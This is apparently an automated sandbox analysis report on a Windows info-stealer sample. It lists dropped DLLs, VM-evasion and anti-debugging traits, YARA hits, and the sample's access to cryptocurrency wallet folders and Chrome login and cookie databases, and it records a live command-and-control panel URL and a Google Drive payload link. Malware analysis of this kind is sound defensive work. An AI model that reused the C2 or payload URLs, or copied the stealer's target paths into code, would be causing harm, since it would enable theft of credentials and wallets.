Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file

Source: 1COK25f1vT.exe, 00000000.00000002.383174684.000000000470A000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.511413114.0000000002B9A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: 1COK25f1vT.exe, 00000000.00000002.383174684.000000000470A000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.511413114.0000000002B9A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: 1COK25f1vT.exe, 0000000C.00000002.511413114.0000000002B9A000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: 1COK25f1vT.exe, 00000000.00000002.383174684.000000000470A000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.511413114.0000000002B9A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: 1COK25f1vT.exe, 00000000.00000002.383174684.000000000470A000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.511413114.0000000002B9A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: 1COK25f1vT.exe, 00000000.00000002.383174684.000000000470A000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.511413114.0000000002B9A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: 1COK25f1vT.exe, 0000000C.00000002.511413114.0000000002B9A000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: 1COK25f1vT.exe, 0000000C.00000002.511282880.0000000002150000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-
Source: 1COK25f1vT.exe, 0000000C.00000002.511282880.0000000002150000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: 1COK25f1vT.exe, 00000000.00000002.383174684.000000000470A000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.511413114.0000000002B9A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: 1COK25f1vT.exe, 00000000.00000002.383174684.000000000470A000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.511413114.0000000002B9A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: 1COK25f1vT.exe, 00000000.00000002.383174684.000000000470A000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.511413114.0000000002B9A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: 1COK25f1vT.exe, 0000000C.00000002.511413114.0000000002B9A000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98EB2 mov eax, dword ptr fs:[00000030h]	0_2_02A98EB2
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98E9D mov eax, dword ptr fs:[00000030h]	0_2_02A98E9D
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98EDD mov eax, dword ptr fs:[00000030h]	0_2_02A98EDD
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98ED1 mov eax, dword ptr fs:[00000030h]	0_2_02A98ED1
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A97B28 mov eax, dword ptr fs:[00000030h]	0_2_02A97B28
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A938DA mov eax, dword ptr fs:[00000030h]	0_2_02A938DA
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96078 mov eax, dword ptr fs:[00000030h]	0_2_02A96078
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A981FF mov eax, dword ptr fs:[00000030h]	0_2_02A981FF
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9414F mov eax, dword ptr fs:[00000030h]	0_2_02A9414F
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00407AF0 mov eax, dword ptr fs:[00000030h]	12_2_00407AF0

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99D25 RtlAddVectoredExceptionHandler,	0_2_02A99D25
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99EA7 RtlAddVectoredExceptionHandler,	0_2_02A99EA7
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99E91 RtlAddVectoredExceptionHandler,	0_2_02A99E91
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99EFE RtlAddVectoredExceptionHandler,	0_2_02A99EFE
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99EC5 RtlAddVectoredExceptionHandler,	0_2_02A99EC5
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99E09 RtlAddVectoredExceptionHandler,	0_2_02A99E09
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99E66 RtlAddVectoredExceptionHandler,	0_2_02A99E66
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99F8C RtlAddVectoredExceptionHandler,	0_2_02A99F8C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99F9C RtlAddVectoredExceptionHandler,	0_2_02A99F9C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99F1F RtlAddVectoredExceptionHandler,	0_2_02A99F1F
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99F6F RtlAddVectoredExceptionHandler,	0_2_02A99F6F
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99F46 RtlAddVectoredExceptionHandler,	0_2_02A99F46
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9A0A2 RtlAddVectoredExceptionHandler,	0_2_02A9A0A2
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9A0FE RtlAddVectoredExceptionHandler,	0_2_02A9A0FE
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9A025 RtlAddVectoredExceptionHandler,	0_2_02A9A025
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9A051 RtlAddVectoredExceptionHandler,	0_2_02A9A051
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99DC3 RtlAddVectoredExceptionHandler,	0_2_02A99DC3
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99DDB RtlAddVectoredExceptionHandler,	0_2_02A99DDB
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99D32 RtlAddVectoredExceptionHandler,	0_2_02A99D32
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99D61 RtlAddVectoredExceptionHandler,	0_2_02A99D61
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99D75 RtlAddVectoredExceptionHandler,	0_2_02A99D75
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99D4D RtlAddVectoredExceptionHandler,	0_2_02A99D4D

Source: Yara match	File source: 12.2.1COK25f1vT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.1COK25f1vT.exe.2004391e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.1COK25f1vT.exe.1ffd81cd.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.1COK25f1vT.exe.1ffb61e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.510992835.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.515598674.000000002030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1COK25f1vT.exe PID: 2132, type: MEMORYSTR

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00414DE8	12_2_00414DE8
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_004186C4	12_2_004186C4
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_004186C4	12_2_004186C4

Source: C:\Users\user\Desktop\1COK25f1vT.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\			Jump to behavior

Windows Analysis Report 1COK25f1vT.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior

Source: 1COK25f1vT.exe	String found in binary or memory: electrum.dat
Source: 1COK25f1vT.exe	String found in binary or memory: %appdata%\Electrum\wallets\
Source: 1COK25f1vT.exe	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 1COK25f1vT.exe	String found in binary or memory: %APPDATA%\Exodus\
Source: 1COK25f1vT.exe	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 1COK25f1vT.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 1COK25f1vT.exe	String found in binary or memory: %APPDATA%\Exodus\
Source: 1COK25f1vT.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 1COK25f1vT.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 1COK25f1vT.exe	String found in binary or memory: %appdata%\Electrum-LTC\wallets\

Source: C:\Users\user\Desktop\1COK25f1vT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.168.46	drive.google.com	United States	15169	GOOGLEUS	false
172.217.168.1	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
185.29.11.112	unknown	European Union	203557	DATACLUB-NL	true

Name	Malicious	Antivirus Detection	Reputation
https://doc-0o-b4-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7bnkiq90sqb2f9a5rfbavvv8a7avoa21/1639944750000/11699732749327025486/*/17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-?e=download	false		high
http://185.29.11.112/rothchildnew/Panel/index.php	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

ID:	542372
Product:	CloudBasic
Start time:	21:11:10
Start date:	19.12.2021
Sample:	1COK25f1vT.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	5918b91ac2931af0267e4af06f3fd2e2
SHA1:	1ce7cccf52a0a569d013c0a91efb4f808c3c6194
SHA256:	41acb7b14d4167374da9039e1324caac71b397bf246abb50cb9ae1ca197b3cc1
Filetype:	Win32 Executable (generic) a (10002005/4) 99.15%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	502263C56F931DF8440D7FD2FA7B7C00	523A3D7C3F4491E67FC710575D8E23314DB2C1A2	94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	CB978304B79EF53962408C611DFB20F5	ECA42F7754FB0017E86D50D507674981F80BC0B9	90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	88FF191FD8648099592ED28EE6C442A5	6A4F818B53606A5602C609EC343974C2103BC9CC	C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6D778E83F74A4C7FE4C077DC279F6867	F5D9CF848F79A57F690DA9841C209B4837C2E6C3	A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	94AE25C7A5497CA0BE6882A00644CA64	F7AC28BBC47E46485025A51EEB6C304B70CEE215	7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	E2F648AE40D234A3892E1455B4DBBE05	D9D750E828B629CFB7B402A3442947545D8D781B	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	E479444BDD4AE4577FD32314A68F5D28	77EDF9509A252E886D4DA388BF9C9294D95498EB	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6DB54065B33861967B491DD1C8FD8595	ED0938BBC0E2A863859AAD64606B8FC4C69B810A	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	2EA3901D7B50BF6071EC8732371B821C	E7BE926F0F7D842271F7EDC7A4989544F4477DA7	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D97A1CB141C6806F0101A5ED2673A63D	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D0873E21721D04E20B6FFB038ACCF2F1	9E39E505D80D67B347B19A349A1532746C1F7F88	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	EFF11130BFE0D9C90C0026BF2FB219AE	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D500D9E24F33933956DF0E26F087FD91	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6F6796D1278670CCE6E2D85199623E27	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5F73A814936C8E7E4A2DFD68876143C8	D960016C4F553E461AFB5B06B039A15D2E76135E	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A2D7D7711F9C0E3E065B2929FF342666	A17B1F36E73B82EF9BFB831058F187535A550EB8	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D0289835D97D103BAD0DD7B9637538A1	8CEEBE1E9ABB0044808122557DE8AAB28AD14575	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	FEE0926AA1BF00F2BEC9DA5DB7B2DE56	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	FDBA0DB0A1652D86CD471EAA509E56EA	3197CB45787D47BAC80223E3E98851E48A122EFA	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	12CC7D8017023EF04EBDD28EF9558305	F859A66009D1CAAE88BF36B569B63E1FBDAE9493	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	71AF7ED2A72267AAAD8564524903CFF6	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	0D1AA99ED8069BA73CFD74B0FDDC7B3A	BA1F5384072DF8AF5743F81FD02C98773B5ED147	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	19A40AF040BD7ADD901AA967600259D9	05B6322979B0B67526AE5CD6E820596CBE7393E4	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	BABF80608FD68A09656871EC8597296C	33952578924B0376CA4AE6A10B8D4ED749D10688	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	0F079489ABD2B16751CEB7447512A70D	679DD712ED1C46FBD9BC8615598DA585D94D5D87	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6EA692F862BDEB446E649E4B2893E36F	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	72E28C902CD947F9A3425B19AC5A64BD	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	9E5A69C777D7E016E5BF8873C18ECAAD	90BAB12FAFE4ABBE03A592C5E1D5B08B3108A3C0	6E61A7288F01B700F5E19936FE2FB771FEDAAC3037C3C3251D6C81BA4AABD959
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	AEC2268601470050E62CB8066DD41A59	363ED259905442C4E3B89901BFD8A43B96BF25E4	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	93D3DA06BF894F4FA21007BEE06B5E7D	1E47230A7EBCFAF643087A1929A385E0D554AD15	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A2F2258C32E3BA9ABF9E9E38EF7DA8C9	116846CA871114B7C54148AB2D968F364DA6142F	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	8B0BA750E7B15300482CE6C961A932F0	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	35FC66BD813D0F126883E695664E7B83	2FD63C18CC5DC4DEFC7EA82F421050E668F68548	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	9910A1BFDC41C5B39F6AF37F0A22AACD	47FA76778556F34A5E7910C816C78835109E4050	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	8D02DD4C29BD490E672D271700511371	F3035A756E2E963764912C6B432E74615AE07011	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	41A348F9BEDC8681FB30FA78E45EDB24	66E76C0574A549F293323DD6F863A8A5B54F3F9B	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	FEFB98394CB9EF4368DA798DEAB00E21	316D86926B558C9F3F6133739C1A8477B9E60740	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	404604CD100A1E60DFDAF6ECF5BA14C0	58469835AB4B916927B3CABF54AEE4F380FF6748	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	849F2C3EBF1FCBA33D16153692D5810F	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	B52A0CA52C9C207874639B62B6082242	6FB845D6A82102FF74BD35F42A2844D8C450413B	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	343AA83574577727AABE537DCCFDEAFC	9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06	393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
C:\Users\user\AppData\Local\Temp\2fda\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	9E682F1EB98A9D41468FC3E50F907635	85E0CECA36F657DDF6547AA0744F0855A27527EE	830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	109F0F02FD37C84BFC7508D4227D7ED5	EF7420141BB15AC334D3964082361A460BFDB975	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
C:\Users\user\AppData\Local\Temp\2fda\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	556EA09421A0F74D31C4C0A89A70DC23	F739BA9B548EE64B13EB434A3130406D23F836E3	F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	569A7A65658A46F9412BDFA04F86E2B2	44CC0038E891AE73C43B61A71A46C97F98B1030D	541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
